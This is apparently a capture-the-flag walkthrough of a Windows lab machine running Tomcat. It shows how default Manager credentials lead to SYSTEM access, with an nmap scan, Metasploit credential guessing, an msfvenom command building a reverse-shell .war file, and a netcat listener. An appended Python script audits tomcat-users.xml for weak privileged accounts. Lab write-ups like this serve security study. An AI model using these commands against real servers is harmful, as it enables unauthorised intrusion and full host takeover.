Jerry

A simple Windows box with weak Tomcat credentials.

This box can be found HERE.

Nmap

nmap -p- -Pn $IP --min-rate=5000
initial nmap results
PORT     STATE SERVICE
8080/tcp open  http-proxy

Initial nmap scan reveals that port 8080 is open. Let's take a look.

home page

It looks like we have Tomcat installed. Let's check out the /manager page.

manager page

We need to authenticate, so let's see if any default credentials work here. I'll use a Metasploit module (search "tomcat login" to find it) to find out.

using metasploit

Let's fill in the RHOST option and run the module.

credentials found

We do indeed have some default credentials! Let's log in and see what we have.

manager page

It seems we can upload a .war file here. I'll use msfvenom to generate a reverse shell that we can use to connect to the machine.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war

Once the .war file is generated, we can upload it to the site.

shell uploaded

Now, all we have to do is open a terminal on our machine and run nc -lnvp 4444. Then we access the endpoint where our shell is located, and we should have a shell!

we have a shell!

We now have a shell as SYSTEM on the machine! All that's left is finding the flags.

flags found

And we have both flags, located on the Administrator's Desktop! 🚩🚩
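
The whole chain above starts from a Tomcat Manager account with a default password, so the matching defensive check is an audit of tomcat-users.xml for privileged roles paired with weak passwords. The Python script below is an added example, not part of the original walkthrough; it assumes plaintext passwords in the file, and the sample config and weak-password list are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Roles that allow deploying applications or administering hosts.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}

# Constructed short list for illustration; replace with your own password policy.
WEAK_PASSWORDS = {"", "tomcat", "admin", "password", "manager", "changeme"}

# Constructed sample config (not taken from the box in this walkthrough).
SAMPLE_CONFIG = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="deployer" password="changeme" roles="manager-script"/>
  <user username="admin" password="admin" roles="admin-gui,manager-gui"/>
  <user username="jenkins" password="Jenkins" roles="manager-script"/>
  <user username="ops" password="Vq7!nR2#xLm94tGz" roles="manager-gui"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
</tomcat-users>"""

def local_name(tag):
    # Strip the "{namespace}" prefix ElementTree adds to namespaced tags.
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return (username, privileged_roles, reason) for each risky account."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local_name(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        risky = sorted(roles & PRIVILEGED_ROLES)
        if not risky:
            continue  # read-only roles such as manager-status cannot deploy
        if password.lower() in WEAK_PASSWORDS:
            reason = "weak or default password"
        elif password.lower() == name.lower():
            reason = "password equals username"
        else:
            continue
        findings.append((name, risky, reason))
    return findings

if __name__ == "__main__":
    for name, roles, reason in audit_tomcat_users(SAMPLE_CONFIG):
        print(f"[!] {name}: {reason}; roles: {', '.join(roles)}")
```

Any account it reports can deploy a .war through the Manager, and because Tomcat on this box runs as SYSTEM, that deployment runs with full control of the host; running the service under a low-privilege account and restricting /manager to trusted addresses limits the impact.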
